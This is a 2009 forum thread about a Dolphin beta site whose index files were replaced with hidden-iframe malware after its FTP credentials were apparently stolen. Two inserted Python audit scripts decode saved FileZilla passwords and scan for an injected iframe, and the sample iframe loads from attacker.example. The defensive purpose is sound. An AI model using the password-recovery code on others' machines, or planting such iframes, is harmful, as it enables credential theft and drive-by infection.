beta site hacked? - trojan horse found

Hi - strange thing happened just now.  I went to log into the admin panel for my beta test site and it didn't work - screen just kept refreshing.  Then I went to look at the site itself in another browser (chrome) and my virus protection system alarms went off saying malware had been found - specifically a trojan horse.  The error message said it was "HTML:Illiframe-B [tri]" whatever that means.   I assume this site has been hacked.  Any idea how they did it? (or for that matter why? - there is nothing in there)  Any way to get rid of it?

Thanks

Rob

Quote · 20 Sep 2009

They do say that when this sort of thing happens, sometimes a compromised FTP access or whatever, then check your PC for Trojans and malware.

If you haven't got a malware checker or remover, then a good free one is

http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html

and go from there

Regards

tyke

Quote · 20 Sep 2009

This was also reported some days earlier.
It seems that all the index files were compromised.
So check your test site for an Illiframe code in the index files.

Kids first
Quote · 20 Sep 2009

Hi Rob, as you know my site was also hacked, take a look at this: http://www.google.com/support/forum/p/Webmasters/thread?tid=0cdb473d121b6895&hl=en

Quote · 20 Sep 2009

No worries, you're not alone :)

http://www.boonex.com/unity/forums/?action=goto&topic_id=Dolphin-or-Server-Hacked-

Scan your computer first... you are lucky if only the test site got infected; on my whole server all index files got f........ed

Quote · 20 Sep 2009

The list of ways could be long & distinguished of how they did it.

Anonymous FTP enabled

Backdooring through triple 6/7 permis...

Weak password w/simple to determine ftp/cpanel

Set passwords for cpanel/ftp using a password generator, do not try to create them yourself (most cPanel/MySQL DB Systems come with one).

In the end, if they were in and got the index.html/php files, then guess what?  A good hacker has found your db login/password and already stolen what they really wanted.

My sites avoid this by utilizing BruteForce, Mod_Security & Mod_Sentry to deal with issues that hackers might try.  While this will stop most, nothing is foolproof.  In addition, a good host utilizing a VPS or Dedicated (prefer Dedicated) servers is one of the most cost effective ways to control hacking.

If you're on a shared server, then they don't need much to drop new index files into the system, as a good hacker will know to just skim from account to account and drop them where they want them.  For those who argue they can't afford the cost of VPS/Dedicated servers, how much is your time worth when you have to go back and fix all of this?

Last note:  Wipe your personal system clean before you go near any more servers.

Quote · 20 Sep 2009

@mydatery I'm not on a shared server, still I was hacked. I think this hack is more about compromised ftp passwords than server type.

Quote · 20 Sep 2009

I've been reading up on this new attack wave; apparently it isn't software related either, cases have been reported on phpBB, SMF, IPB and so on, so it's not Dolphin related.

you can check if your site is infected somehow by using this

http://www.unmaskparasites.com/

regards

tyke

Quote · 21 Sep 2009

Also see: Beware: FileZilla Doesn’t Protect Your Passwords  http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/

Quote · 21 Sep 2009
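The FileZilla warning above is the practical reason for the "scan your PC first" advice earlier in this thread: a client that keeps saved FTP passwords in a plain file on disk hands them to any trojan that reads that file. The script below is an added example, not code from the thread, from FileZilla or from Boonex. It parses a constructed sitemanager.xml in the layout assumed here (one <Server> per saved site with <Host>, <Port>, <Protocol>, <User> and an optional <Pass>, held either as plain text or tagged encoding="base64"), reports which accounts have a password recoverable from disk, and produces a CSPRNG-generated replacement for each, which is the "use a password generator" advice given earlier in the thread. The hostnames, usernames and passwords in the sample are invented, and the numeric protocol mapping is an assumption.

```python
#!/usr/bin/env python3
"""Audit the FTP credentials a FileZilla profile keeps on disk and produce a
fresh, randomly generated replacement for each one that needs rotating.

Added example; not code from the thread, from FileZilla or from Boonex.
Assumed sitemanager.xml layout (constructed sample below): one <Server>
per saved site with <Host>, <Port>, <Protocol>, <User> and, when the
password was saved, a <Pass> element holding it in plain text or as
base64 (encoding="base64"). Hosts, users and passwords are invented.
"""
import base64
import secrets
import string
import xml.etree.ElementTree as ET

# Constructed stand-in for ~/.filezilla/sitemanager.xml (under %APPDATA%\FileZilla on Windows).
SAMPLE_SITEMANAGER = """<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.mysite-mysite.example</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>mysite</User>
      <Pass>hunter2</Pass>
      <Name>beta site</Name>
    </Server>
    <Server>
      <Host>sftp.other.example</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">c3VwZXJzZWNyZXQ=</Pass>
      <Name>other host</Name>
    </Server>
    <Server>
      <Host>ftp.nopass.example</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>rob</User>
      <Name>password not saved</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

# Assumed meaning of FileZilla's numeric <Protocol> values for the two we care about.
PROTOCOL_NAMES = {"0": "FTP (credentials travel in the clear)", "1": "SFTP"}


def stored_credentials(xml_text):
    """One dict per <Server>: what the profile holds and whether a password is
    recoverable by anything that can read the file (a trojan included)."""
    root = ET.fromstring(xml_text)
    entries = []
    for srv in root.iter("Server"):
        pass_el = srv.find("Pass")
        password = None
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                # base64 is encoding, not encryption: trivially reversible
                password = base64.b64decode(pass_el.text).decode("utf-8")
            else:
                password = pass_el.text
        proto = (srv.findtext("Protocol") or "").strip()
        entries.append({
            "name": srv.findtext("Name") or "",
            "host": srv.findtext("Host") or "",
            "port": int(srv.findtext("Port") or 0),
            "protocol": PROTOCOL_NAMES.get(proto, "protocol " + proto),
            "user": srv.findtext("User") or "",
            "password_on_disk": password is not None,
            "password_recoverable": password,
        })
    return entries


def new_password(length=24):
    """CSPRNG-generated password: the thread's advice is to generate, not invent."""
    alphabet = string.ascii_letters + string.digits + "!#%&*+-=?@^_"
    return "".join(secrets.choice(alphabet) for _ in range(length))


def rotation_plan(xml_text):
    """(account, replacement password) for every account whose password is on disk."""
    return [
        (entry["user"] + "@" + entry["host"], new_password())
        for entry in stored_credentials(xml_text)
        if entry["password_on_disk"]
    ]


if __name__ == "__main__":
    for entry in stored_credentials(SAMPLE_SITEMANAGER):
        state = "password ON DISK" if entry["password_on_disk"] else "no password stored"
        print(f'{entry["user"]}@{entry["host"]}:{entry["port"]}  {entry["protocol"]}  {state}')
    for account, replacement in rotation_plan(SAMPLE_SITEMANAGER):
        print("rotate", account, "->", replacement)
```

Point it at the real file by reading it into `stored_credentials`; every account it lists with a password on disk should be treated as already leaked if the machine was infected, and rotated on the server side before the client is used again. Rotating only helps if the new password is not saved back into the same plain-text file on a still-infected PC, which is why the thread's order of operations (clean the PC, then change passwords, then rebuild the site) matters.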

Hey guys - thanks for jumping in on this.  Looks like it might be my fault - I had a weak username - a hyphenated domain and I used half of it as a username.  Not sure how they got the password though.   In meetings tomorrow so won't have time to fix right away.  See message below from my host http://alterhosting.com.   This is failure number 6 on the betas.  Synergy - your information about compromised FileZilla is especially disturbing - need to check into that as soon as I get some time.

Thanks for your help everyone

Rob

------------

Hi Rob,

All index.php and home.php files have been replaced with the hacker's
files.

/httpdocs/index.php
/httpdocs/administration/index.php
/httpdocs/flash/index.php
/httpdocs/flash/modules/board/skins/index.php
/httpdocs/flash/modules/chat/skins/index.php
/httpdocs/flash/modules/desktop/skins/index.php
/httpdocs/flash/modules/im/skins/index.php
/httpdocs/flash/modules/mp3/files/index.php
/httpdocs/flash/modules/mp3/skins/index.php
/httpdocs/flash/modules/photo/skins/index.php
/httpdocs/flash/modules/video/files/index.php
/httpdocs/flash/modules/video/skins/index.php
/httpdocs/flash/modules/video_comments/skins/index.php
/httpdocs/flash/modules/video_comments/files/index.php
/httpdocs/modules/index.php
/httpdocs/modules/boonex/ads/index.php
/httpdocs/modules/boonex/articles/index.php
and all folders under /httpdocs/modules/boonex/

You will need to remove all files from /httpdocs and install Dolphin anew.

I changed your FTP settings for mysite-mysite.com to the following:
username: xxxxx
password: xxxxx

Quote · 21 Sep 2009
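The host's list above, together with the earlier suggestion to check the index files for the injected iframe code, amounts to two checks a practitioner can script: a content scan of every index.php and home.php under the webroot for a hidden iframe, and a hash comparison against a known-clean backup to catch altered or dropped files that carry no iframe at all. The Python below is an added example, not code from the thread, from the host or from Boonex/Dolphin; it builds a constructed webroot and a matching clean backup in a temporary directory so it runs offline. The hidden-iframe pattern it looks for (zero width or height, visibility:hidden, display:none) and the attacker.example URL in the sample are assumptions about the payload, not something the thread quotes.

```python
#!/usr/bin/env python3
"""Locate injected hidden <iframe> tags in index.php/home.php files and
list every file that differs from a known-clean backup.

Added example, not code from the thread, the host, or Boonex/Dolphin.
Assumptions: the payload is a hidden iframe (zero size, visibility:hidden
or display:none) inserted into the PHP entry files, and the clean backup
mirrors the webroot's directory layout.
"""
import hashlib
import os
import re
import tempfile

TARGET_NAMES = {"index.php", "home.php"}  # the files the host reported as replaced

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
# Attributes that make a frame invisible; a legitimate embed is sized and visible.
HIDDEN_RE = re.compile(
    r"""width\s*=\s*["']?0(?!\d)|height\s*=\s*["']?0(?!\d)|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.IGNORECASE,
)


def suspicious_iframes(text):
    """Return every <iframe> tag in text whose attributes hide the frame."""
    return [m.group(0) for m in IFRAME_RE.finditer(text) if HIDDEN_RE.search(m.group(0))]


def scan_webroot(webroot):
    """Walk webroot; map relative path -> hidden iframe tags for each hit file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if name not in TARGET_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                tags = suspicious_iframes(fh.read())
            if tags:
                hits[os.path.relpath(path, webroot)] = tags
    return hits


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def diff_against_backup(webroot, backup):
    """Relative paths present under webroot that are absent from, or differ
    by content from, the clean backup. Catches dropped or altered files that
    carry no iframe and so escape the content heuristic."""
    changed = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            live = os.path.join(dirpath, name)
            rel = os.path.relpath(live, webroot)
            clean = os.path.join(backup, rel)
            if not os.path.isfile(clean) or sha256_of(live) != sha256_of(clean):
                changed.append(rel)
    return sorted(changed)


# Constructed sample content; the iframe URL is an assumption, not from the thread.
CLEAN_INDEX = "<?php\n// Dolphin entry point (constructed sample)\nrequire_once('inc/header.inc.php');\n"
INJECTED_INDEX = CLEAN_INDEX + (
    '<iframe src="http://attacker.example/in.php" width="0" height="0" '
    'style="visibility:hidden"></iframe>\n'
)


def build_demo():
    """Write a constructed webroot plus a clean backup under a temp dir.
    Returns (webroot, backup). The paths mirror the host's report."""
    base = tempfile.mkdtemp(prefix="iframe-scan-")
    webroot = os.path.join(base, "httpdocs")
    backup = os.path.join(base, "backup")
    layout = {
        "index.php": INJECTED_INDEX,
        "administration/index.php": INJECTED_INDEX,
        "flash/modules/chat/skins/index.php": INJECTED_INDEX,
        "modules/boonex/ads/index.php": CLEAN_INDEX,   # left alone by the attacker
        "inc/header.inc.php": "<?php\n// untouched include\n",
    }
    for rel, body in layout.items():
        clean_body = CLEAN_INDEX if body == INJECTED_INDEX else body
        for root, content in ((webroot, body), (backup, clean_body)):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
    # A file dropped by the attacker with no iframe: only the hash diff sees it.
    dropped = os.path.join(webroot, "images", ".cache.php")
    os.makedirs(os.path.dirname(dropped), exist_ok=True)
    with open(dropped, "w", encoding="utf-8") as fh:
        fh.write("<?php\n// constructed stand-in for a dropped file that carries no iframe\n")
    return webroot, backup


if __name__ == "__main__":
    webroot, backup = build_demo()
    for rel, tags in sorted(scan_webroot(webroot).items()):
        print("hidden iframe:", rel, "->", tags[0][:70])
    print("changed vs backup:", diff_against_backup(webroot, backup))
```

Against a real site, call `scan_webroot('/path/to/httpdocs')` and `diff_against_backup('/path/to/httpdocs', '/path/to/clean-backup')`. Anything the hash diff lists that the iframe scan does not is the more interesting find, and the host's remedy of wiping /httpdocs and reinstalling from a clean copy remains the right one, since a content scan only shows what it knows to look for.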

Synergy, note that I listed weak password/username as a potential risk.  I simply highlighted in addition the risk that is assumed when one runs on a shared server, in addition to other things.  To help you out, here is the post again.

The list of ways could be long & distinguished of how they did it.

Anonymous FTP enabled

Backdooring through triple 6/7 permis...

Weak password w/simple to determine ftp/cpanel

Set passwords for cpanel/ftp using a password generator, do not try to create them yourself (most cPanel/MySQL DB Systems come with one).

In the end, if they were in and got the index.html/php files, then guess what?  A good hacker has found your db login/password and already stolen what they really wanted.

My sites avoid this by utilizing BruteForce, Mod_Security & Mod_Sentry to deal with issues that hackers might try.  While this will stop most, nothing is foolproof.  In addition, a good host utilizing a VPS or Dedicated (prefer Dedicated) servers is one of the most cost effective ways to control hacking.

If you're on a shared server, then they don't need much to drop new index files into the system, as a good hacker will know to just skim from account to account and drop them where they want them.  For those who argue they can't afford the cost of VPS/Dedicated servers, how much is your time worth when you have to go back and fix all of this?

Last note:  Wipe your personal system clean before you go near any more servers.


Remember, our goal here is to create a history to help educate today and tomorrow, not just the current poster.

Quote · 21 Sep 2009

@mydatery No, our goal is to solve the matter at hand, if not the current poster who else, this post is the reason we're answering in this thread.

This has nothing to do with weak password/username; our server FTP password has been compromised, it doesn't matter how strong or weak the password/username are.

Quote · 21 Sep 2009

The only one who knows this password was me and Boonex - I sent it to them recently, but maybe someone hijacked enroute.  Still not clear on how this happened but will investigate tomorrow evening.

Rob

Quote · 21 Sep 2009

If this is that Gumblar.cn exploit then it's not so much that you have sent your login details to somebody else and they have been intercepted en route; it's the fact that you or the person who has your login details is infected with this malware trojan, and it is really very important to give your system the once-over.

http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html

That one is free and highly rated. (I shifted 18 from my system with that.)

regards

Tyke

Quote · 21 Sep 2009

Yes, Tyke is correct about what needs to be done, you should follow these steps to clean your PC:  8-step Viruses/Spyware/Malware Preliminary Removal Instructions http://www.techspot.com/vb/topic58138.html

Quote · 21 Sep 2009

Actually, Synergy, it had to do with an FTP client being infected, it now appears.  Oops, guess you didn't catch that part.

Now, moving on.  The purpose of utilizing a forum and not a chatroom/blog is to create a historical/searchable reference that others can visit and utilize in the future to solve similar problems when they discover them.  Hence the reason we are here: to provide support/assistance to the current poster (today) and the future posters (future) so that others might not have to wait forever to get answers to the same questions.

If we were only here for the original poster (caltrade in this instance) then this thread would be destroyed once he has obtained the answers he needs and resolved the issue at hand.

As far as the link you're posting everywhere goes, it's nothing more than forum spam, as the steps you give out do NOTHING to actually clean the PC system you're having them do it on.  If it did you would not be making statements like this in the opening post of that forum:

PLEASE DO NOT USE THIS GUIDE AS A ONE-STOP-FIX-ALL.
It only serves to help you produce some logs for us so we can see if your system needs further attention and cleaning.
Please also ensure you complete ALL steps in this thread, BEFORE you post the requested log files.

DO NOT SKIP ANY OF THE INSTRUCTIONS

If you have any problems following any of the instructions, please ask for assistance.

Why would I want to create logs for you to look at?  Hmmm, especially if it just means they go to you so you can tell me what I need to buy to clean my system. 

I'll stick to the way I do things, thank you, to protect my computers/servers and so on.  Learned long ago, if a site is trustable to download from then it's all over the place.  The fact that I would have to download something from your site to check my system, and the site you're listing is not well known, screams high risk/don't even think about clicking that download button you have in the early steps.

Quote · 21 Sep 2009

@mydatery  If you look at the top you will see I posted:

"Hi Rob, as you know my site was also hacked, take a look at this: http://www.google.com/support/forum/p/Webmasters/thread?tid=0cdb473d121b6895&hl=en"

Which means I know how it originated; I commented on the end results, didn't think I had to write a book as you often do. I'm not going to debate this with you, knock yourself out, we all know this is your forte, so babble on alone.

Quote · 21 Sep 2009

What in the world are you babbling about?  Great... You knew what was up with this and instead you've decided to spam the forums here (which you rarely participate in) with news of something you knew about on 7/11/2009 (I can read dates in forums, my teacher will be so proud) and failed to share with anyone.  Instead, you took it to the Google forums and not to the place where people have far more work in their sites than the average Google AdSense person has.

Wow!  Not bad, you managed to keep the secret for 2 months.

Again, I stand by the statement that these forums are here to help people today and people tomorrow.  If one believes it is only for today then one has a very closed perspective on how forums work.

Quote · 21 Sep 2009

Oh, about the guide: it's a starting point to get rid of the viruses/spyware/malware.  Each person can decide for themselves how far they want to go with it.

Quote · 21 Sep 2009

I'm really through with you.  I see you don't comprehend well, I'm sorry, carry on.

Quote · 21 Sep 2009

Mydatery,  Synergy helps people frequently here - often by private message, and her message is anything but spam - please don't take cheap shots.   I have found both of your posts useful, and I can see that Lyubovl has made a blog post on this.  I did a scan of my computer last night and it didn't find anything but will use the other tools people have recommended later today.  Thanks for your help everyone.

p.s.

It is files on my site that are infected, not the database - right?  In other words, if I do a "restore" to an uninfected system it should be fine - right?

Quote · 21 Sep 2009

Rob, it's only the files, I was told to restore from backup, so it should be fine provided the Viruses/Spyware/Malware is off your personal system.

Quote · 21 Sep 2009

@mydatery,

I suppose your teacher wouldn't be so proud that you missed this post from April 20, 2009, 3 months before Synergy is accused of keeping a secret. Boonex ignored it, as well as many others who didn't have time to bother with it. The <iframe> hack via FTP compromise has been going on not only on Boonex sites but many others, as discussed on this forum and many others.

So it's now been 5 months since the first report of this; it came and went with a total of five posts.

http://www.boonex.com/unity/forums/topic/Dolphin-or-Server-Hacked-.htm

I remember this post, but also know that required authentication of login accounts helps out with this as well. But that's another story for another day.

Fact of the matter is that this is not a defect in Dolphin, but a defect in your FTP client and browser. This has been directly related to IE for one, and password storage on unsecured FTP connections.

Regards,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
Quote · 21 Sep 2009

@Tyke

You recommended this?

http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html

With all due respect, I hated it.  It didn't do squat but wanted payments to remove some adware - it was also trying to sell me a registry cleaner.  Advertising all over the place, I had to remove it from my system.

Rob

Quote · 22 Sep 2009

Oh OK, well I'm sorry about that. Nonetheless this software is highly recommended, so here is the direct link where I got this from myself.

http://www.malwarebytes.org/

to repeat,

Its free

No advertisements or pestering to buy some ad-removal module

Free updates to the latest threats database,

Scan any and all drives.

What you have experienced must be something to do with that CNET place, as it's nothing like you described from this direct link, as I use this programme daily.

Anyhow, sorry again.

Regards

Tyke

Quote · 23 Sep 2009

Thank you Tyke - that link is much better.  Someone must have packaged it with another program at that other link.  I just ran it and it did seem good, however it didn't find anything so I don't know if it would have told me I have to pay them if it had found something.

Rob

Quote · 23 Sep 2009

I use it myself. If it's the correct free version direct from malwarebytes.org, then it's completely free. And it is quite good. It's able to remove things that many of the other common free programs like Ad-Aware and Spybot cannot remove.

Its database of what it detects is not as large as the others', but it does a superior job at removing what it does find.

It's also the same software I recommended when this hack was brought up 5 months ago, as DosDawg pointed out.

https://www.deanbassett.com
Quote · 23 Sep 2009

Thanks guys. I scanned using several of the techniques mentioned here - I had some adware but there was no malware on this computer.  Someone on the blog is spreading the misinformation that this "doesn't have anything to do with sharing passwords with other people".  That is completely wrong - it has everything to do with sharing your passwords with other people.  If they have the virus and access your account via an insecure FTP connection then your site can be compromised.   Bigal has a good suggestion there that when you need to share your site access you create a temporary account for this purpose.

Rob

Quote · 23 Sep 2009

Hmmm, I found with this malware scanner a backdoor in the file desktop 3.5.0.  It's now removed. But you see, sometimes other programs find more than others. :)

Kids first
Quote · 23 Sep 2009